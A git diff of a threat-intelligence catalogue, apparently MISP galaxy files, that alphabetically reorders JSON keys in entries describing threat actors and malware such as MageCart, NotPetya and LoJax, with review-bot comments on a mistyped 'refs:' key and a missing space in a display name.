- "uuid": "bea5e256-bcc0-11e8-a478-bbf7e7585a1e"
+ "uuid": "bea5e256-bcc0-11e8-a478-bbf7e7585a1e",
+ "value": "Unnamed Actor"
 },
 {
- "value": "COBALT DICKENS",
 "description": "”A threat group associated with the Iranian government. The threat group created lookalike domains to phish targets and used credentials to steal intellectual property from specific resources, including library systems.”",
 "meta": {
 "refs": [
@@ -5882,10 +5881,10 @@
 "Cobalt Dickens"
 ]
 },
- "uuid": "6c79bd1a-bfde-11e8-8c33-db4d9968671a"
+ "uuid": "6c79bd1a-bfde-11e8-8c33-db4d9968671a",
+ "value": "COBALT DICKENS"
 },
 {
- "value": "MageCart",
 "description": "Digital threat management company RiskIQ tracks the activity of MageCart group and reported their use of web-based card skimmers since 2016.",
 "meta": {
 "refs": [
@@ -5893,22 +5892,21 @@
 "https://www.bleepingcomputer.com/news/security/feedify-hacked-with-magecart-information-stealing-script/"
 ]
 },
- "uuid": "0768fd50-c547-11e8-9aa5-776183769eab"
+ "uuid": "0768fd50-c547-11e8-9aa5-776183769eab",
+ "value": "MageCart"
 },
 {
- "value": "Domestic Kitten",
 "description": "An extensive surveillance operation targets specific groups of individuals with malicious mobile apps that collect sensitive information on the device along with surrounding voice recordings. Researchers with CheckPoint discovered the attack and named it Domestic Kitten. The targets are Kurdish and Turkish natives, and ISIS supporters, all Iranian citizens.",
 "meta": {
 "refs": [
 "https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/"
 ]
 },
- "uuid": "dda1b28e-c558-11e8-8666-27cf61d1d7ee"
+ "uuid": "dda1b28e-c558-11e8-8666-27cf61d1d7ee",
+ "value": "Domestic Kitten"
 },
 {
- "value": "FASTCash",
 "description": "Treasury has identified a sophisticated cyber-enabled ATM cash out campaign we are calling FASTCash. FASTCash has been active since late 2016 targeting banks in Africa and Asia to remotely compromise payment switch application servers within banks to facilitate fraudulent transactions, primarily involving ATMs, to steal cash equivalent to tens of millions of dollars. FBI has attributed malware used in this campaign to the North Korean government. We expect FASTCash to continue targeting retail payment systems vulnerable to remote exploitation.",
- "uuid": "e38d32a2-c708-11e8-8785-472c4cfccd85",
 "related": [
 {
 "dest-uuid": "e306fe62-c708-11e8-89f2-073e396e5403",
@@ -5917,7 +5915,9 @@
 ],
 "type": "similar"
 }
- ]
+ ],
+ "uuid": "e38d32a2-c708-11e8-8785-472c4cfccd85",
+ "value": "FASTCash"
 }
 ],
 "version": 69
diff --git a/clusters/tool.json b/clusters/tool.json
index 57219ff..9a69d8a 100644
--- a/clusters/tool.json
+++ b/clusters/tool.json
@@ -4210,14 +4210,14 @@
 "value": "KONNI"
 },
 {
- "value": "NOKKI",
- "uuid": "9e4fd0d3-9736-421c-b1e1-96c1d3665c80",
 "description": "Beginning in early 2018, Unit 42 observed a series of attacks using a previously unreported malware family, which we have named ‘NOKKI’. The malware in question has ties to a previously reported malware family named KONNI, however, after careful consideration, we believe enough differences are present to introduce a different malware family name. To reflect the close relationship with KONNI, we chose NOKKI, swapping KONNI’s Ns and Ks. Because of code overlap found within both malware families, as well as infrastructure overlap, we believe the threat actors responsible for KONNI are very likely also responsible for NOKKI. Previous reports stated it was likely KONNI had been in use for over three years in multiple campaigns with a heavy interest in the Korean peninsula and surrounding areas. As of this writing, it is not certain if the KONNI or NOKKI operators are related to known adversary groups operating in the regions of interest, although there is evidence of a tenuous relationship with a group known as Reaper.",
 "meta": {
 "refs": [
 "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/"
 ]
- }
+ },
+ "uuid": "9e4fd0d3-9736-421c-b1e1-96c1d3665c80",
+ "value": "NOKKI"
 },
 {
 "description": "Recently, Palo Alto Networks researchers discovered an advanced Android malware we’ve named “SpyDealer” which exfiltrates private data from more than 40 apps and steals sensitive messages from communication apps by abusing the Android accessibility service feature. SpyDealer uses exploits from a commercial rooting app to gain root privilege, which enables the subsequent data theft.",
@@ -5748,17 +5748,16 @@
 "value": "KEYMARBLE"
 },
 {
- "value": "BISKVIT",
 "description": "The BISKVIT Trojan is a multi-component malware written in C#. We dubbed this malware BISKVIT based on the namespaces used in the code, which contain the word “biscuit”. Unfortunately, there is already an existing unrelated malware called BISCUIT, so BISKVIT is used instead, which is the Russian translation of biscuit.",
 "meta": {
 "refs": [
 "https://www.fortinet.com/blog/threat-research/russian-army-exhibition-decoy-leads-to-new-biskvit-malware.html"
 ]
 },
- "uuid": "69ed8a69-8b33-4195-9b21-a1f4cd76acde"
+ "uuid": "69ed8a69-8b33-4195-9b21-a1f4cd76acde",
+ "value": "BISKVIT"
 },
 {
- "value": "Sirefef",
 "description": "This family of malware uses stealth to hide its presence on your PC. Trojans in this family can do different things, including: -Downloading and running other files -Contacting remote hosts -Disabling security features\nMembers of the family can also change search results, which can generate money for the hackers who use Sirefef.",
 "meta": {
 "refs": [
@@ -5768,28 +5767,23 @@
 "Win32/Sirefef"
 ]
 },
- "uuid": "641464a6-b690-11e8-976e-bffc9a17c6a4"
+ "uuid": "641464a6-b690-11e8-976e-bffc9a17c6a4",
+ "value": "Sirefef"
 },
 {
- "value": "MagentoCore Malware",
 "description": "A Dutch security researcher has lifted the veil on a massive website hacking campaign that has infected 7,339 Magento stores with a script that collects payment card data from people shopping on the sites.\nThe script is what industry experts call a \"payment card scraper\" or \"skimmer.\" Hackers breach sites and modify their source code to load the script along with its legitimate files.\nThe script usually loads on store checkout pages and secretly records payment card details entered in payment forms, data that it later sends to a server under the hacker's control.",
 "meta": {
 "refs": [
 "https://www.bleepingcomputer.com/news/security/magentocore-malware-found-on-7-339-magento-stores/"
 ]
 },
- "uuid": "df05f528-bb57-11e8-9fd4-8320e14151f2"
+ "uuid": "df05f528-bb57-11e8-9fd4-8320e14151f2",
+ "value": "MagentoCore Malware"
 },
 {
- "value": "NotPetya",
 "description": "Threat actors deploy a tool, called NotPetya, with the purpose of encrypting data on victims' machines and rendering it unusable. The malware was spread through tax software that companies and individuals require for filing taxes in Ukraine. Australia, Estonia, Denmark, Lithuania, Ukraine, the United Kingdom, and the United States issued statements attributing NotPetya to Russian state-sponsored actors. In June 2018, the United States sanctioned Russian organizations believed to have assisted the Russian state-sponsored actors with the operation.",
 "meta": {
- "refs": [
- "https://www.cfr.org/interactive/cyber-operations/notpetya"
- ],
- "synonyms": [
- "Not Petya"
- ],
+ "cfr-suspected-state-sponsor": "Russian Federation",
 "cfr-suspected-victims": [
 "Rosneft",
 "Cie de Saint-Gobain",
@@ -5802,59 +5796,63 @@
 "Merck",
 "Kyivenergo"
 ],
- "cfr-suspected-state-sponsor": "Russian Federation",
- "cfr-type-of-incident": "Data destruction",
 "cfr-target-category": [
 "Government",
 "Private sector"
+ ],
+ "cfr-type-of-incident": "Data destruction",
+ "refs": [
+ "https://www.cfr.org/interactive/cyber-operations/notpetya"
+ ],
+ "synonyms": [
+ "Not Petya"
 ]
 },
- "uuid": "00c31914-bc0e-11e8-8241-3ff3b5e4671d"
+ "uuid": "00c31914-bc0e-11e8-8241-3ff3b5e4671d",
+ "value": "NotPetya"
 },
 {
- "value": "Xbash",
 "description": "Xbash is a malware family that is targeting Linux and Microsoft Windows servers. We can tie this malware, which we have named Xbash, to the Iron Group, a threat actor group known for previous ransomware attacks.",
 "meta": {
 "refs": [
 "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
 ]
 },
- "uuid": "10c981cc-4ef1-4719-8ed7-c5e4c2f6c7a3"
+ "uuid": "10c981cc-4ef1-4719-8ed7-c5e4c2f6c7a3",
+ "value": "Xbash"
 },
 {
- "value": "LoJax",
 "description": "rootkit for the Unified Extensible Firmware Interface (UEFI). Used by APT28. 
The researchers named the rootkit LoJax, after the malicious samples of the LoJack anti-theft software that were discovered earlier this year.",
 "meta": {
 "refs": [
 "https://www.bleepingcomputer.com/news/security/apt28-uses-lojax-first-uefi-rootkit-seen-in-the-wild/"
 ]
 },
- "uuid": "6d53a74e-c8a5-11e8-a123-332e4eaac9bb"
+ "uuid": "6d53a74e-c8a5-11e8-a123-332e4eaac9bb",
+ "value": "LoJax"
 },
 {
- "value": "Chainshot",
 "description": "The new piece of malware, which received the name Chainshot, is used in the early stages of an attack to activate a downloader for the final payload in a malicious chain reaction.",
 "meta": {
 "refs": [
 "https://www.bleepingcomputer.com/news/security/new-chainshot-malware-found-by-cracking-512-bit-rsa-key/"
 ]
 },
- "uuid": "a032460e-c54c-11e8-9965-43b7b6469a65"
+ "uuid": "a032460e-c54c-11e8-9965-43b7b6469a65",
+ "value": "Chainshot"
 },
 {
- "value": "CroniX",
 "description": "The researchers named this campaign CroniX, a moniker that derives from the malware's use of Cron to achieve persistence and Xhide to launch executables with fake process names. The cryptocurrency minted on victim's computers is Monero (XMR), the coin of choice in cryptojacking activities. To make sure that rival activity does not revive, CroniX deletes the binaries of other cryptominers present on the system. Another action CroniX takes to establish supremacy on the machine is to check the names of the processes and kill those that swallow 60% of the CPU or more.",
 "meta": {
 "refs": [
 "https://www.bleepingcomputer.com/news/security/cronix-cryptominer-kills-rivals-to-reign-supreme/"
 ]
 },
- "uuid": "55d29d1c-c550-11e8-9904-47c1d86af7c5"
+ "uuid": "55d29d1c-c550-11e8-9904-47c1d86af7c5",
+ "value": "CroniX"
 },
 {
- "value": "FASTCash",
 "description": "Treasury has identified a sophisticated cyber-enabled ATM cash out campaign we are calling FASTCash. 
FASTCash has been active since late 2016 targeting banks in Africa and Asia to remotely compromise payment switch application servers within banks to facilitate fraudulent transactions, primarily involving ATMs, to steal cash equivalent to tens of millions of dollars. FBI has attributed malware used in this campaign to the North Korean government. We expect FASTCash to continue targeting retail payment systems vulnerable to remote exploitation.",
- "uuid": "e306fe62-c708-11e8-89f2-073e396e5403",
 "related": [
 {
 "dest-uuid": "e38d32a2-c708-11e8-8785-472c4cfccd85",
@@ -5863,26 +5861,28 @@
 ],
 "type": "similar"
 }
- ]
+ ],
+ "uuid": "e306fe62-c708-11e8-89f2-073e396e5403",
+ "value": "FASTCash"
 },
 {
- "value": "ZEBROCY",
 "description": "ZEBROCY is a tool used by APT28, which has been observed since late 2015. The communications module used by ZEBROCY transmits using HTTP. The implant has key logging and file exfiltration functionality and utilises a file collection capability that identifies files with particular extensions.",
 "meta": {
 "refs": [
 "https://www.ncsc.gov.uk/alerts/indicators-compromise-malware-used-apt28"
 ]
 },
- "uuid": "8a2ae47a-c7b2-11e8-b223-ab4d8f78f3ef"
+ "uuid": "8a2ae47a-c7b2-11e8-b223-ab4d8f78f3ef",
+ "value": "ZEBROCY"
 },
 {
- "value": "CoalaBot",
 "meta": {
 "refs:": [
 "https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html"
 ]
 },
- "uuid": "92628a72-c874-11e8-a094-ebbb3bd1f412"
+ "uuid": "92628a72-c874-11e8-a094-ebbb3bd1f412",
+ "value": "CoalaBot"
 }
 ],
 "version": 93
diff --git a/galaxies/android.json b/galaxies/android.json
index 8edbee5..7a1d0af 100644
--- a/galaxies/android.json
+++ b/galaxies/android.json
@@ -1,9 +1,9 @@
 {
 "description": "Android malware galaxy based on multiple open sources.",
- "type": "android",
- "version": 3,
- "name": "Android",
 "icon": "android",
+ "name": "Android",
+ "namespace": "misp",
+ "type": "android",
 "uuid": "84310ba3-fa6a-44aa-b378-b9e3271c58fa",
- "namespace": "misp"
+ "version": 3
 }
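Review bot: The CoalaBot entry in hunk `@@ -5863,26 +5861,28 @@` keeps the key `"refs:"` (with a trailing colon) inside its `meta` object, and the key sort leaves it in place; anything reading `meta.refs` will find no reference for this entry even though the URL is there. That context line should read ` "refs": [`. CoalaBot is also the only entry in this hunk without a `description`, so a one-line summary drawn from the linked write-up would bring it in line with its neighbours. The commit re-emits this entry's `uuid` and `value` lines, so the same pass could have corrected the key.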
diff --git a/galaxies/backdoor.json b/galaxies/backdoor.json
index 6504c9c..4aa624d 100644
--- a/galaxies/backdoor.json
+++ b/galaxies/backdoor.json
@@ -1,9 +1,9 @@
 {
 "description": "Malware Backdoor galaxy.",
- "type": "backdoor",
- "version": 1,
- "name": "Backdoor",
 "icon": "door-open",
+ "name": "Backdoor",
+ "namespace": "misp",
+ "type": "backdoor",
 "uuid": "75436e27-cb57-4f32-bf1d-9636dd78a2bf",
- "namespace": "misp"
+ "version": 1
 }
diff --git a/galaxies/banker.json b/galaxies/banker.json
index 4726db9..979dcaf 100644
--- a/galaxies/banker.json
+++ b/galaxies/banker.json
@@ -1,9 +1,9 @@
 {
 "description": "Banking malware galaxy.",
- "type": "banker",
- "version": 3,
- "name": "Banker",
 "icon": "usd",
+ "name": "Banker",
+ "namespace": "misp",
+ "type": "banker",
 "uuid": "59f20cce-5420-4084-afd5-0884c0a83832",
- "namespace": "misp"
+ "version": 3
 }
diff --git a/galaxies/botnet.json b/galaxies/botnet.json
index 0d89c6e..dad2244 100644
--- a/galaxies/botnet.json
+++ b/galaxies/botnet.json
@@ -1,9 +1,9 @@
 {
 "description": "Botnet galaxy.",
- "type": "botnet",
- "version": 2,
- "name": "Botnet",
 "icon": "sitemap",
+ "name": "Botnet",
+ "namespace": "misp",
+ "type": "botnet",
 "uuid": "90ccdf38-1649-11e8-b8bf-e7326d553087",
- "namespace": "misp"
+ "version": 2
 }
diff --git a/galaxies/branded_vulnerability.json b/galaxies/branded_vulnerability.json
index 0c287a4..195902c 100644
--- a/galaxies/branded_vulnerability.json
+++ b/galaxies/branded_vulnerability.json
@@ -1,9 +1,9 @@
 {
 "description": "List of known vulnerabilities and exploits",
- "type": "branded-vulnerability",
- "version": 2,
- "name": "Branded Vulnerability",
 "icon": "bug",
+ "name": "Branded Vulnerability",
+ "namespace": "misp",
+ "type": "branded-vulnerability",
 "uuid": "fda8c7c2-f45a-11e7-9713-e75dac0492df",
- "namespace": "misp"
+ "version": 2
 }
diff --git a/galaxies/cert-eu-govsector.json b/galaxies/cert-eu-govsector.json
index 84cf5aa..821c66f 100644
--- a/galaxies/cert-eu-govsector.json
+++ b/galaxies/cert-eu-govsector.json
@@ -1,9 +1,9 @@
 {
- "type": "cert-eu-govsector",
- "name": "Cert EU GovSector",
 "description": "Cert EU GovSector",
- "version": 2,
 "icon": "globe",
+ "name": "Cert EU GovSector",
+ "namespace": "misp",
+ "type": "cert-eu-govsector",
 "uuid": "68858a48-b898-11e7-91ce-bf424ef9b662",
- "namespace": "misp"
+ "version": 2
 }
diff --git a/galaxies/exploit-kit.json b/galaxies/exploit-kit.json
index 74b7999..87f4167 100644
--- a/galaxies/exploit-kit.json
+++ b/galaxies/exploit-kit.json
@@ -1,9 +1,9 @@
 {
- "type": "exploit-kit",
- "name": "Exploit-Kit",
 "description": "Exploit-Kit is an enumeration of some exploitation kits used by adversaries. The list includes document, browser and router exploit kits.It's not meant to be totally exhaustive but aim at covering the most seen in the past 5 years",
- "version": 4,
 "icon": "internet-explorer",
+ "name": "Exploit-Kit",
+ "namespace": "misp",
+ "type": "exploit-kit",
 "uuid": "6ab240ec-bd79-11e6-a4a6-cec0c932ce01",
- "namespace": "misp"
+ "version": 4
 }
diff --git a/galaxies/malpedia.json b/galaxies/malpedia.json
index 8247085..9d99858 100644
--- a/galaxies/malpedia.json
+++ b/galaxies/malpedia.json
@@ -1,9 +1,9 @@
 {
 "description": "Malware galaxy based on Malpedia archive.",
- "type": "malpedia",
- "version": 1,
- "name": "Malpedia",
 "icon": "shield",
+ "name": "Malpedia",
+ "namespace": "misp",
+ "type": "malpedia",
 "uuid": "1d1c9af9-37fa-4deb-a928-f9b0abc7354a",
- "namespace": "misp"
+ "version": 1
 }
diff --git a/galaxies/microsoft-activity-group.json b/galaxies/microsoft-activity-group.json
index 4d87279..c41959a 100644
--- a/galaxies/microsoft-activity-group.json
+++ b/galaxies/microsoft-activity-group.json
@@ -1,9 +1,9 @@
 {
- "name": "Microsoft Activity Group actor",
- "type": "microsoft-activity-group",
 "description": "Activity groups as described by Microsoft",
- "version": 3,
 "icon": "user-secret",
+ "name": "Microsoft Activity Group actor",
+ "namespace": "misp",
+ "type": "microsoft-activity-group",
 "uuid": "74c869e8-0b8e-4e5f-96e6-cd992e07a505",
- "namespace": "misp"
+ "version": 3
 }
diff --git a/galaxies/mitre-attack-pattern.json b/galaxies/mitre-attack-pattern.json
index 8c02ce1..052cfeb 100644
--- a/galaxies/mitre-attack-pattern.json
+++ b/galaxies/mitre-attack-pattern.json
@@ -1,9 +1,9 @@
 {
 "description": "ATT&CK Tactic",
- "uuid": "c4e851fa-775f-11e7-8163-b774922098cd",
- "version": 5,
- "type": "mitre-attack-pattern",
- "name": "Attack Pattern",
 "icon": "map",
- "namespace": "deprecated"
+ "name": "Attack Pattern",
+ "namespace": "deprecated",
+ "type": "mitre-attack-pattern",
+ "uuid": "c4e851fa-775f-11e7-8163-b774922098cd",
+ "version": 5
 }
diff --git a/galaxies/mitre-course-of-action.json b/galaxies/mitre-course-of-action.json
index 6e9443b..fdd4cad 100644
--- a/galaxies/mitre-course-of-action.json
+++ b/galaxies/mitre-course-of-action.json
@@ -1,9 +1,9 @@
 {
- "version": 6,
+ "description": "ATT&CK Mitigation",
 "icon": "chain",
 "name": "Course of Action",
- "description": "ATT&CK Mitigation",
+ "namespace": "deprecated",
 "type": "mitre-course-of-action",
 "uuid": "6fcb4472-6de4-11e7-b5f7-37771619e14e",
- "namespace": "deprecated"
+ "version": 6
 }
diff --git a/galaxies/mitre-enterprise-attack-attack-pattern.json b/galaxies/mitre-enterprise-attack-attack-pattern.json
index 29678fa..4ee4f96 100644
--- a/galaxies/mitre-enterprise-attack-attack-pattern.json
+++ b/galaxies/mitre-enterprise-attack-attack-pattern.json
@@ -1,9 +1,9 @@
 {
- "name": "Enterprise Attack - Attack Pattern",
- "type": "mitre-enterprise-attack-attack-pattern",
 "description": "ATT&CK Tactic",
- "uuid": "fa7016a8-1707-11e8-82d0-1b73d76eb204",
- "version": 4,
 "icon": "map",
- "namespace": "mitre-attack"
+ "name": "Enterprise Attack - Attack Pattern",
+ "namespace": "mitre-attack",
+ "type": "mitre-enterprise-attack-attack-pattern",
+ "uuid": "fa7016a8-1707-11e8-82d0-1b73d76eb204",
+ "version": 4
 }
diff --git a/galaxies/mitre-enterprise-attack-course-of-action.json b/galaxies/mitre-enterprise-attack-course-of-action.json
index 05beced..158491c 100644
--- a/galaxies/mitre-enterprise-attack-course-of-action.json
+++ b/galaxies/mitre-enterprise-attack-course-of-action.json
@@ -1,9 +1,9 @@
 {
- "name": "Enterprise Attack - Course of Action",
- "type": "mitre-enterprise-attack-course-of-action",
 "description": "ATT&CK Mitigation",
- "uuid": "fb5a36c0-1707-11e8-81f5-d732b22a4982",
- "version": 4,
 "icon": "chain",
- "namespace": "mitre-attack"
+ "name": "Enterprise Attack - Course of Action",
+ "namespace": "mitre-attack",
+ "type": "mitre-enterprise-attack-course-of-action",
+ "uuid": "fb5a36c0-1707-11e8-81f5-d732b22a4982",
+ "version": 4
 }
diff --git a/galaxies/mitre-enterprise-attack-intrusion-set.json b/galaxies/mitre-enterprise-attack-intrusion-set.json
index 893f1e4..4387d10 100644
--- a/galaxies/mitre-enterprise-attack-intrusion-set.json
+++ b/galaxies/mitre-enterprise-attack-intrusion-set.json
@@ -1,9 +1,9 @@
 {
- "name": "Enterprise Attack -Intrusion Set",
- "type": "mitre-enterprise-attack-intrusion-set",
 "description": "Name of ATT&CK Group",
- "uuid": "1f3b8c56-1708-11e8-b211-17a60c0f73ee",
- "version": 4,
 "icon": "user-secret",
- "namespace": "mitre-attack"
+ "name": "Enterprise Attack -Intrusion Set",
+ "namespace": "mitre-attack",
+ "type": "mitre-enterprise-attack-intrusion-set",
+ "uuid": "1f3b8c56-1708-11e8-b211-17a60c0f73ee",
+ "version": 4
 }
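Review bot: In the `galaxies/mitre-enterprise-attack-intrusion-set.json` hunk, `+ "name": "Enterprise Attack -Intrusion Set"` re-emits the display name with the space missing after the hyphen, while the sibling galaxy files in this commit use `"Enterprise Attack - Attack Pattern"`, `"Enterprise Attack - Course of Action"` and `"Enterprise Attack - Malware"`. Since `name` is the human-facing label and `type` is the identifier, changing the line to `"name": "Enterprise Attack - Intrusion Set"` looks safe, though it is worth confirming nothing downstream keys off the display string.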
diff --git a/galaxies/mitre-enterprise-attack-malware.json b/galaxies/mitre-enterprise-attack-malware.json
index 520b2fd..63e216f 100644
--- a/galaxies/mitre-enterprise-attack-malware.json
+++ b/galaxies/mitre-enterprise-attack-malware.json
@@ -1,9 +1,9 @@
 {
- "name": "Enterprise Attack - Malware",
- "type": "mitre-enterprise-attack-malware",
 "description": "Name of ATT&CK software",
- "uuid": "fbb19af0-1707-11e8-9fd6-dbd88a04d33a",
- "version": 4,
 "icon": "optin-monster",
- "namespace": "mitre-attack"
+ "name": "Enterprise Attack - Malware",
+ "namespace": "mitre-attack",
+ "type": "mitre-enterprise-attack-malware",
+ "uuid": "fbb19af0-1707-11e8-9fd6-dbd88a04d33a",
+ "version": 4
 }
diff --git a/galaxies/mitre-enterprise-attack-relationship.json b/galaxies/mitre-enterprise-attack-relationship.json
index 0befd47..9353050 100644
--- a/galaxies/mitre-enterprise-attack-relationship.json
+++ b/galaxies/mitre-enterprise-attack-relationship.json
@@ -1,9 +1,9 @@
 {
- "name": "Enterprise Attack - Relationship",
- "type": "mitre-enterprise-attack-relationship",
 "description": "Mitre Relationship",
- "uuid": "fc404638-1707-11e8-a5cf-b78b9b562766",
- "version": 4,
 "icon": "link",
- "namespace": "mitre-attack"
+ "name": "Enterprise Attack - Relationship",
+ "namespace": "mitre-attack",
+ "type": "mitre-enterprise-attack-relationship",
+ "uuid": "fc404638-1707-11e8-a5cf-b78b9b562766",
+ "version": 4
 }
diff --git a/galaxies/mitre-enterprise-attack-tool.json b/galaxies/mitre-enterprise-attack-tool.json
index d49456b..6ffbdd2 100644
--- a/galaxies/mitre-enterprise-attack-tool.json
+++ b/galaxies/mitre-enterprise-attack-tool.json
@@ -1,9 +1,9 @@
 {
- "name": "Enterprise Attack - Tool",
- "type": "mitre-enterprise-attack-tool",
 "description": "Name of ATT&CK software",
- "uuid": "fbfa0470-1707-11e8-be22-eb46b373fdd3",
- "version": 4,
 "icon": "gavel",
- "namespace": "mitre-attack"
+ "name": "Enterprise Attack - Tool",
+ "namespace": "mitre-attack",
+ "type": "mitre-enterprise-attack-tool",
+ "uuid": "fbfa0470-1707-11e8-be22-eb46b373fdd3",
+ "version": 4
 }
diff --git a/galaxies/mitre-intrusion-set.json b/galaxies/mitre-intrusion-set.json
index 5ad5277..05afe99 100644
--- a/galaxies/mitre-intrusion-set.json
+++ b/galaxies/mitre-intrusion-set.json
@@ -1,9 +1,9 @@
 {
- "uuid": "1023f364-7831-11e7-8318-43b5531983ab",
 "description": "Name of ATT&CK Group",
- "version": 7,
 "icon": "user-secret",
- "type": "mitre-intrusion-set",
 "name": "Intrusion Set",
- "namespace": "deprecated"
+ "namespace": "deprecated",
+ "type": "mitre-intrusion-set",
+ "uuid": "1023f364-7831-11e7-8318-43b5531983ab",
+ "version": 7
 }
diff --git a/galaxies/mitre-malware.json b/galaxies/mitre-malware.json
index 06e0cf9..9406205 100644
--- a/galaxies/mitre-malware.json
+++ b/galaxies/mitre-malware.json
@@ -1,9 +1,9 @@
 {
- "type": "mitre-malware",
- "version": 5,
- "name": "Malware",
- "uuid": "d752161c-78f6-11e7-a0ea-bfa79b407ce4",
- "icon": "optin-monster",
 "description": "Name of ATT&CK software",
- "namespace": "deprecated"
+ "icon": "optin-monster",
+ "name": "Malware",
+ "namespace": "deprecated",
+ "type": "mitre-malware",
+ "uuid": "d752161c-78f6-11e7-a0ea-bfa79b407ce4",
+ "version": 5
 }
diff --git a/galaxies/mitre-mobile-attack-attack-pattern.json b/galaxies/mitre-mobile-attack-attack-pattern.json
index 8397ba0..ef838e1 100644
--- a/galaxies/mitre-mobile-attack-attack-pattern.json
+++ b/galaxies/mitre-mobile-attack-attack-pattern.json
@@ -1,9 +1,9 @@
 {
- "name": "Mobile Attack - Attack Pattern",
- "type": "mitre-mobile-attack-attack-pattern",
 "description": "ATT&CK Tactic",
- "uuid": "1c6d1332-1708-11e8-847c-e3c5643c41a5",
- "version": 4,
 "icon": "map",
- "namespace": "mitre-attack"
+ "name": "Mobile Attack - Attack Pattern",
+ "namespace": "mitre-attack",
+ "type": "mitre-mobile-attack-attack-pattern",
+ "uuid": "1c6d1332-1708-11e8-847c-e3c5643c41a5",
+ "version": 4
 }
diff --git a/galaxies/mitre-mobile-attack-course-of-action.json b/galaxies/mitre-mobile-attack-course-of-action.json
index 4752e94..f90087e 100644
--- a/galaxies/mitre-mobile-attack-course-of-action.json
+++ b/galaxies/mitre-mobile-attack-course-of-action.json
@@ -1,9 +1,9 @@
 {
- "name": "Mobile Attack - Course of Action",
- "type": "mitre-mobile-attack-course-of-action",
 "description": "ATT&CK Mitigation",
- "uuid": "0282356a-1708-11e8-8f53-975633d5c03c",
- "version": 4,
 "icon": "chain",
- "namespace": "mitre-attack"
+ "name": "Mobile Attack - Course of Action",
+ "namespace": "mitre-attack",
+ "type": "mitre-mobile-attack-course-of-action",
+ "uuid": "0282356a-1708-11e8-8f53-975633d5c03c",
+ "version": 4
 }
diff --git a/galaxies/mitre-mobile-attack-intrusion-set.json b/galaxies/mitre-mobile-attack-intrusion-set.json
index 07416e9..1db8781 100644
--- a/galaxies/mitre-mobile-attack-intrusion-set.json
+++ b/galaxies/mitre-mobile-attack-intrusion-set.json
@@ -1,9 +1,9 @@
 {
- "name": "Mobile Attack - Intrusion Set",
- "type": "mitre-mobile-attack-intrusion-set",
 "description": "Name of ATT&CK Group",
- "uuid": "0314e554-1708-11e8-b049-8f8a42b5bb62",
- "version": 4,
 "icon": "user-secret",
- "namespace": "mitre-attack"
+ "name": "Mobile Attack - Intrusion Set",
+ "namespace": "mitre-attack",
+ "type": "mitre-mobile-attack-intrusion-set",
+ "uuid": "0314e554-1708-11e8-b049-8f8a42b5bb62",
+ "version": 4
 }
diff --git a/galaxies/mitre-mobile-attack-malware.json b/galaxies/mitre-mobile-attack-malware.json
index 91a0e81..c733326 100644
--- a/galaxies/mitre-mobile-attack-malware.json
+++ b/galaxies/mitre-mobile-attack-malware.json
@@ -1,9 +1,9 @@
 {
- "name": "Mobile Attack - Malware",
- "type": "mitre-mobile-attack-malware",
 "description": "Name of ATT&CK software",
- "uuid": "03e3853a-1708-11e8-95c1-67cf3f801a18",
- "version": 4,
 "icon": "optin-monster",
- "namespace": "mitre-attack"
+ "name": "Mobile Attack - Malware",
+ "namespace": "mitre-attack",
+ "type": "mitre-mobile-attack-malware",
+ "uuid": "03e3853a-1708-11e8-95c1-67cf3f801a18",
+ "version": 4
 }
diff --git a/galaxies/mitre-mobile-attack-relationship.json b/galaxies/mitre-mobile-attack-relationship.json
index a84e654..e99d84d 100644
--- a/galaxies/mitre-mobile-attack-relationship.json
+++ b/galaxies/mitre-mobile-attack-relationship.json
@@ -1,9 +1,9 @@
 {
- "name": "Mobile Attack - Relationship",
- "type": "mitre-mobile-attack-relationship",
 "description": "Mitre Relationship",
- "uuid": "fc8471aa-1707-11e8-b306-33cbe96a1ede",
- "version": 4,
 "icon": "link",
- "namespace": "mitre-attack"
+ "name": "Mobile Attack - Relationship",
+ "namespace": "mitre-attack",
+ "type": "mitre-mobile-attack-relationship",
+ "uuid": "fc8471aa-1707-11e8-b306-33cbe96a1ede",
+ "version": 4
 }
diff --git a/galaxies/mitre-mobile-attack-tool.json b/galaxies/mitre-mobile-attack-tool.json
index 572a88b..7f92b58 100644
--- a/galaxies/mitre-mobile-attack-tool.json
+++ b/galaxies/mitre-mobile-attack-tool.json
@@ -1,9 +1,9 @@
 {
- "name": "Mobile Attack - Tool",
- "type": "mitre-mobile-attack-tool",
 "description": "Name of ATT&CK software",
- "uuid": "1d0b4bce-1708-11e8-9e6e-1b130c9b0a91",
- "version": 4,
 "icon": "gavel",
- "namespace": "mitre-attack"
+ "name": "Mobile Attack - Tool",
+ "namespace": "mitre-attack",
+ "type": "mitre-mobile-attack-tool",
+ "uuid": "1d0b4bce-1708-11e8-9e6e-1b130c9b0a91",
+ "version": 4
 }
diff --git a/galaxies/mitre-pre-attack-attack-pattern.json b/galaxies/mitre-pre-attack-attack-pattern.json
index 8475a54..ae97d22 100644
--- a/galaxies/mitre-pre-attack-attack-pattern.json
+++ b/galaxies/mitre-pre-attack-attack-pattern.json
@@ -1,9 +1,9 @@
 {
- "name": "Pre Attack - Attack Pattern",
- "type": "mitre-pre-attack-attack-pattern",
 "description": "ATT&CK Tactic",
- "uuid": "1f665850-1708-11e8-9cfe-4792b2a91402",
- "version": 4,
 "icon": "map",
- "namespace": "mitre-attack"
+ "name": "Pre Attack - Attack Pattern",
+ "namespace": "mitre-attack",
+ "type": "mitre-pre-attack-attack-pattern",
+ "uuid": "1f665850-1708-11e8-9cfe-4792b2a91402",
+ "version": 4
 }
diff --git a/galaxies/mitre-pre-attack-intrusion-set.json b/galaxies/mitre-pre-attack-intrusion-set.json
index 8115ddd..9570445 100644
--- a/galaxies/mitre-pre-attack-intrusion-set.json
+++ b/galaxies/mitre-pre-attack-intrusion-set.json
@@ -1,9 +1,9 @@
 {
- "name": "Pre Attack - Intrusion Set",
- "type": "mitre-pre-attack-intrusion-set",
 "description": "Name of ATT&CK Group",
- "uuid": "1fb6d5b4-1708-11e8-9836-8bbc8ce6866e",
- "version": 4,
 "icon": "user-secret",
- "namespace": "mitre-attack"
+ "name": "Pre Attack - Intrusion Set",
+ "namespace": "mitre-attack",
+ "type": "mitre-pre-attack-intrusion-set",
+ "uuid": "1fb6d5b4-1708-11e8-9836-8bbc8ce6866e",
+ "version": 4
 }
